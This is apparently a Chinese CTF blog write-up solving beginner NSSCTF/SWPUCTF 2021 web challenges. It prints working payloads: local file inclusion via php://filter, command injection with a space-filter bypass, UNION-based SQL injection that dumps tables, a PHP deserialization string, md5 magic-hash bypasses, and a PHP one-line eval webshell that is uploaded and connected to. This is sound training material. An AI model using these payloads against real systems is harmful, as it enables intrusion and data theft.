[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

这篇具有很好参考价值的文章主要介绍了[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

NSSCTF平台:https://www.nssctf.cn/

[SWPUCTF 2021 新生赛]gift_F12

直接查看源代码F12flag即可。
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}

[第五空间 2021]签到题

NSSCTF{welcometo5space}

[SWPUCTF 2021 新生赛]jicao

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

所以为满足if条件,输出flag,构造Payload:

get:json={"x":"wllm"}
post:id=wllmNB   

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{037de6d6-3b9e-4bb9-903f-4236c239b42a}

[SWPUCTF 2021 新生赛]easy_md5

<?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
}
else {
    echo 'wrong!';
}
?>

这里就是md5碰撞了 这里要求ab输入值不相同,md5加密后的值弱类型相等,就想到了0e的科学计数法

这里需要让password != name 又需要让他们的md5值相等,所以我们需要md5绕过 这里可以用bphackbar

QNKCDZO,s878926199a

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{bc1ccfc9-194c-4f11-809a-3a39293691fc}

[SWPUCTF 2021 新生赛]caidao

直接告诉了密码 蚁剑直接连 flag在根目录下面。
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{6bb489d4-e364-4302-ad0a-35cb90ee4534}

[SWPUCTF 2021 新生赛]include

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

Payload:?file=php://filter/convert.base64-encode/resource=flag.php

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{4b858152-b482-4984-a358-ad8dc781923e}

[SWPUCTF 2021 新生赛]easyrce

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

?url=system("ls /");  #发现了 flllllaaaaaaggggggg 

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{4ddfeb4b-a30e-42a9-8bf4-f8a480a8b083}

[SWPUCTF 2021 新生赛]easy_sql

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
这里告诉我们了传入的参数是wllm 发现有报错,说明存在注入点 存在字符型注入 用order by 查询字段数,查得字段数为3输入4就报错

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

?wllm=-1' union select 1,2,3 --+  ##-1  一个负数不存在的id值来触发报错

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

-1' union select 1,2,database(); --+  ##爆破数据库

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='test_db'--+  #爆破表

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
这里有两个表test_tbuserstables的字段替换成column字段先看test_tb

wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='test_tb'--+

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

-1' union select 1,2,group_concat(id,flag) from test_tb --+ #查询

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{94713769-163e-4e8d-a310-98e17dd7bd37}

[第五空间 2021]WebFTP

使用御剑扫描后台访问phpinfo.php 搜索FLAG即可。

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{5d64eb71-b973-4708-a275-8f0cf576990b}

[SWPUCTF 2021 新生赛]babyrce

 <?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1) 
{
    include "../next.php";
}
else
    echo "小饼干最好吃啦!";
?> 小饼干最好吃啦!

bp抓包改cookieadmin=1 出现了rasalghul.php进行访问 然后又是代码审计

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

 <?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/ /", $ip)){
      die('nonono');
  }
  $a = shell_exec($ip);
  echo $a;
}
?> 

这里是烧过空格 ?url=cat${IFS}/f*
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{4f2323c6-1c66-49d4-98c0-65f184730a7b}

[SWPUCTF 2021 新生赛]Do_you_know_http

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
直接抓包然后修改User-Agent:WLLM和本地访问X-Forwarded-For:127.0.0.1 访问/secretttt.php即可得到flag

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{1c22fbcd-0661-40d6-921c-01b09b3257a6}

[SWPUCTF 2021 新生赛]ez_unserialize

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?> 

这里的考点就是反序列 可以参考大佬文章:https://blog.csdn.net/solitudi/article/details/113588692

Payload:?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{1387617d-68fc-4c72-aef2-f6bbafc59ed3}

[SWPUCTF 2021 新生赛]easyupload1.0

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
新建一个一句话木马<?php @eval($_POST['shell']);?>格式改为php然后抓包 使用phtml 然后使用WebSell工具连接 发现连接成功!!!

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
然后这个FLAG是假的怎么提交都不对 发现.git提示 尝试写个phpinfo(); 🆗得到FLAG

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{7022989b-6f80-433c-b625-0e3ab22c0803}

[SWPUCTF 2021 新生赛]easyupload2.0

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{41784aaa-7609-4a3e-8c92-7d5ea8efb3a9}

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

🆗感谢大家观看 这篇就先到这里了,都是些比较入门的题目,希望对刚入门CTF想刷题的小伙伴有帮助感谢大家的支持!文章来源地址https://www.toymoban.com/news/detail-443761.html

到了这里,关于[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [SWPUCTF 2021 新生赛]ez_unserialize

    题目在哪呢?查看源代码试试 User-agent: * Disallow: 什么东西呢 发现disallow Robots 协议(也称为爬虫协议、机器人协议等)的全称是 “网络爬虫排除标准”(Robots Exclusion Protocol),网站通过 Robots 协议告诉搜索引擎哪些页面可抓,哪些页面不能抓。 disallow就是爬虫不能搜索的所以

    2024年02月05日
    浏览(32)
  • [SWPUCTF 2021 新生赛]easy_md5

    由于php中存在==的弱类型比较,所以我们可以通过hash比较的缺陷去绕过 比如: 也就是只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会现转换字符串的类型,在进行比较,而在比较是因为两个数都是以0e开头会被认为是科学计数法,0e后面

    2024年02月05日
    浏览(28)
  • 2023年8月30日-[SWPUCTF 2021 新生赛]jicao

    包含了flag.php文件,设定了一个POST请求的id和GET请求的json 语句会对GET请求的数据进行json解码 如果id和json变量的值都等于设定字符串,打印flag get传参数 的时候,直接 ?参数名=参数值 。 post传参数 可以利用hackbar插件。

    2024年02月10日
    浏览(29)
  • 字符型注入([SWPUCTF 2021 新生赛]easy_sql)

    拿到题目,查看源码,可知是要输入参数wllm。 输入参数/?wllm=1,得到会显 继续输入参数/?wllm=1\\\',报错,确定为字符型漏洞 1.查看字段列表,发现在字段4报错,确定为3列 2.查看回显 3.查询数据库名(test_db) 4.查看test_db库的表(users) 5.查询字段 6.出现flag字段,查看flag字段的内容

    2024年02月09日
    浏览(28)
  • CTF 全讲解:[SWPUCTF 2021 新生赛]Do_you_know_http

    项目 描述 搜索引擎 Bing 、 Google AI 大模型 文心一言 、 通义千问 、 讯飞星火认知大模型 、 ChatGPT MDN Web Docs https://developer.mozilla.org/zh-CN/ 项目 描述 HackBar 1.2.2 浏览器 Chrome 项目 描述 得分项 HTTP 请求头 题目来源 NSSCTF 雾现 访问题目首页 hello.php 得到如下界面: 意在希望我们使

    2024年02月08日
    浏览(32)
  • [SWPUCTF 2022 新生赛]numgame

    这道题有点东西网页一段计算框,只有加和减数字,但是永远到大不了20,页面也没啥特别的,准备看源码,但是打不开,我以为是环境坏掉了,看wp别人也这样,只不过大佬的开发者工具可以打开,我的就不行 最后试了一下,你要么就在网页右上角更多工具里面手动打开,

    2024年02月13日
    浏览(26)
  • [SWPUCTF 2022 新生赛]ez_ez_php

    这段代码是一个简单的PHP文件处理脚本。让我们逐行进行分析: error_reporting(0);  - 这行代码设置了错误报告的级别为0,意味着不显示任何错误。 if (isset($_GET[\\\'file\\\'])) {  - 这行代码检查是否存在一个名为\\\"file\\\"的GET参数。 if ( substr($_GET[\\\"file\\\"], 0, 3) === \\\"php\\\" ) {  - 这行代码使用 su

    2024年02月12日
    浏览(27)
  • 【pwn】[SWPUCTF 2022 新生赛]InfoPrinter--格式化字符串漏洞,got表劫持,data段修改

    下载附件,checksec检查程序保护情况: No RELRO ,说明got表可修改 接下来看主程序: 函数逻辑还是比较简单,14行出现格式化字符串漏洞,配合pwntools的fmtstr_payload模块可直接攻击,然后就是题目提供了libc,然后第10行又泄露puts函数的地址,可直接计算出基址,然后就是/bin/sh这

    2024年02月08日
    浏览(32)
  • XFF漏洞利用([SWPUCTF 2021 新赛]Do_you_know_http)

    User-Agent:使得服务器能够识别客户使用的操作系统,浏览器版本等.(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据库中) Cookie:网站为了辨别用户身份进行session跟踪,并储存在用户本地终端上的数据(通常经过加密) X-Forwarded-For:简称XFF头,

    2024年02月09日
    浏览(30)
  • 【unity2021-2023打包安卓工程】踩坑记录

    踩了快一个星期的坑,希望能帮助到有需要的人 项目使用的是unity2019版本,由于很多新的插件和功能都已经不支持2019了,所以升级unity的版本 在升级版本的过程中遇到了很多的问题,因为本身基础较差,加之比较新,网上能找到的解决办法少之又少,当然也存在不希望外露

    2024年02月07日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包